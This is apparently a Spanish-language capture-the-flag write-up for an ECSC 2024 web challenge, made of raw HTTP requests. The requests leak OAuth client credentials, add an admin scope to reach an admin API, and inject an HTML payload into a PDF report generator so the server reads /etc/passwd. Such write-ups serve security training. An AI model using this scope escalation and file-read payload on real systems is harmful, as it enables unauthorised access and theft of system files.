
Este extra:

GET /api/v1/creds HTTP/1.1
Host: woauthalaundry.challs.open.ecsc2024.it
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: */*
Referer: http://woauthalaundry.challs.open.ecsc2024.it/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Connection: close

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Origin: *
Content-Length: 80
Content-Type: application/json
Date: Mon, 22 Apr 2024 13:38:17 GMT
Server: nginx/1.25.5
Connection: close

{"client_id":"ELX4Gr0HSRZx","client_secret":"d63a85bc118c4743b44ab7bdb880cc32"}




GET /openid/authentication?response_type=token%20id_token&client_id=ELX4Gr0HSRZx&scope=openid%20laundry%20amenities%20admin&redirect_uri=http://localhost:5173/&grant_type=implicit&nonce=nonce HTTP/1.1
Host: woauthalaundry.challs.open.ecsc2024.it
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: */*
Referer: http://woauthalaundry.challs.open.ecsc2024.it/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Connection: close

El admin xD ese añadelo

y al final 


GET /api/v1/admin HTTP/1.1
Host: woauthalaundry.challs.open.ecsc2024.it
Authorization: Bearer 026d5ed6d384466ea219fce702d59b72
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: */*
Referer: http://woauthalaundry.challs.open.ecsc2024.it/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Connection: close



HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Origin: *
Content-Length: 109
Content-Type: application/json
Date: Mon, 22 Apr 2024 13:57:39 GMT
Server: nginx/1.25.5
Connection: close

{"admin_endpoints":[{"exampleBody":{"requiredBy":"John Doe"},"methods":["POST"],"path":"/generate_report"}]}


Aqui creamos el pdf y en requiredBy estara el payload


POST /api/v1/generate-report HTTP/1.1
Host: woauthalaundry.challs.open.ecsc2024.it
Content-Length: 29
Authorization: Bearer 026d5ed6d384466ea219fce702d59b72
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://woauthalaundry.challs.open.ecsc2024.it
Referer: http://woauthalaundry.challs.open.ecsc2024.it/admin
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Connection: close

{"requiredBy":"**John Doe**"}


payload: <script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>


fuente: https://blog.dixitaditya.com/xss-to-read-internal-files



